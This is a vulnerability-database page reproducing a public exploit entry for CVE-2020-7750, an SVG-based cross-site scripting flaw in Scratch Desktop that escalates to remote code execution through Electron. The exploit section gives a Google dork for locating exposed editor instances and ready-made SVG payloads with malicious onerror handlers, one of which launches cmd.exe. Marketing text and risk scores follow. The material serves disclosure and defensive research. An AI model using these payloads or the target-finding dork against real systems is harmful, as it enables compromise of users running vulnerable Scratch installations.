Vulners
Lucene search
Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution Vulnerabilities
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2020-7750 | 21 Sep 202104:42 | – | circl |
 | CVE-2020-7750 | 21 Oct 202016:20 | – | cve |
 | CVE-2020-7750 Cross-site Scripting (XSS) | 21 Oct 202016:20 | – | cvelist |
 | Scratch Desktop 3.17 - Remote Code Execution | 2 Jul 202100:00 | – | exploitdb |
 | EUVD-2020-1459 | 7 Oct 202500:30 | – | euvd |
 | Cross-Site Scripting in scratch-svg-renderer | 9 Nov 202014:21 | – | github |
 | Cross-Site Scripting in scratch-svg-renderer | 9 Nov 202014:24 | – | nodejs |
 | CVE-2020-7750 | 21 Oct 202017:15 | – | nvd |
 | GHSA-J977-G5VJ-J27G Cross-Site Scripting in scratch-svg-renderer | 9 Nov 202014:21 | – | osv |
 | Scratch Desktop 3.17 Code Execution / Cross Site Scripting | 2 Jul 202100:00 | – | packetstorm |
10
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jul 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 26.8
CVSS 3.19.6
EPSS0.06179